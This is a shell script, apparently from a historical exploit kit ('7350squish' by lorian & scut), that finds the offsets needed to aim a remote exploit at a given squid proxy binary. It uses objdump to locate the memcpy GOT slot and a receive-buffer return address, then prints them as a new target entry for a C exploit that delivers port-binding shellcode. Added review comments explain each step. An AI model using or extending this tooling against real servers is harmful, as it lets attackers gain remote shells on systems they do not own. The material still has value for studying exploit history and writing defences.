#!/bin/sh
# 7350squish offset finder
# lorian & scut
#
# Takes one argument, the path of a squid binary, and uses objdump + awk to
# pull two values out of it: the GOT slot of memcpy and an address derived
# from a "push" immediate in the disassembly. Both are printed as one entry
# of a C target table (the x86_lnx_portshell symbols it names are defined
# elsewhere, not in this file). Requires awk and objdump on PATH.

#######################################
# Check that every named utility is on PATH and abort the script otherwise.
# Arguments: names of utilities to look for
# Outputs:   one "checking for <util>: <path>" line per utility on stdout
# NOTE(review): a bare `exit` leaves status 0, so the caller cannot tell
# "aborted" from success. `$*` / `$util` are unquoted, `which` is less
# portable than `command -v`, and `echo -n` behaves differently across
# /bin/sh implementations.
#######################################
check_util () {
  for util in $*; do
    echo -n "checking for $util: "
    if ! which $util; then
      echo "not found, aborting"
      exit
    fi
  done
}

echo "7350squish exploit offset finder"
echo
# Exactly one argument is accepted: the path of the binary to inspect.
# NOTE(review): the usage error also exits with status 0 (see check_util).
if [ $# != 1 ]; then
  echo "usage: $0 /path/to/squid/binary"
  echo
  exit
fi;
check_util awk objdump
echo
# Disassemble the binary, find lines whose bytes contain "68 00 02 00 00"
# (a push of the 0x200 immediate), take the last line grep printed -- the
# line after the last match -- and keep the text after its '$', i.e. the
# "0x..." immediate of that next instruction.
# objdump errors are discarded, so an unreadable or non-ELF file silently
# yields an empty bufferbase.
# NOTE(review): $1 is unquoted here and in the objdump -R call below, so a
# path containing whitespace breaks both pipelines.
bufferbase=`objdump -D $1 2>/dev/null | \
  grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`
# hex2num converts the "0x..." text to a number without strtonum: the loop
# i = 1 .. n-2 reads substr(s, i+2, 1), i.e. characters 3..n of s, which
# skips the leading "0x"; hex letters are mapped by hand after tolower and
# decimal digits are coerced by awk in the v * 16 + c step. The result
# plus 144 (0x90) is printed as 0x%08x.
retaddr=`echo $bufferbase | awk 'function hex2num(s) {
    n = length (s)
    v = 0
    for (i = 1; i < n-1; i++) {
      c = tolower(substr (s, i+2, 1));
      if (c=="a") c=10;
      if (c=="b") c=11;
      if (c=="c") c=12;
      if (c=="d") c=13;
      if (c=="e") c=14;
      if (c=="f") c=15;
      v = v * 16 + c;
    }
    return v
  }
  { printf ("0x%08x\n", hex2num ($0) + 144) }'`
# Earlier variant kept for reference: relies on awk parsing "0x..." as a
# number, which is not portable across awk implementations.
#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`
# Dynamic relocation table: the entry whose symbol column ends in "memcpy"
# gives the GOT slot address in its first column, printed with a 0x prefix.
# If the binary has no such relocation, retloc is just "0x".
retloc=`objdump -R $1 2>/dev/null | \
  grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`
# Print the target-table entry. The /* ... */ comments are part of the
# emitted text, not shell comments.
echo "{ \"NEW TARGET\","
echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
echo "$retloc, /* GOT: memcpy */"
echo "$retaddr, /* packet receive buffer + 0x90 */"
echo "0x0182, 288 },"
echo
echo finished.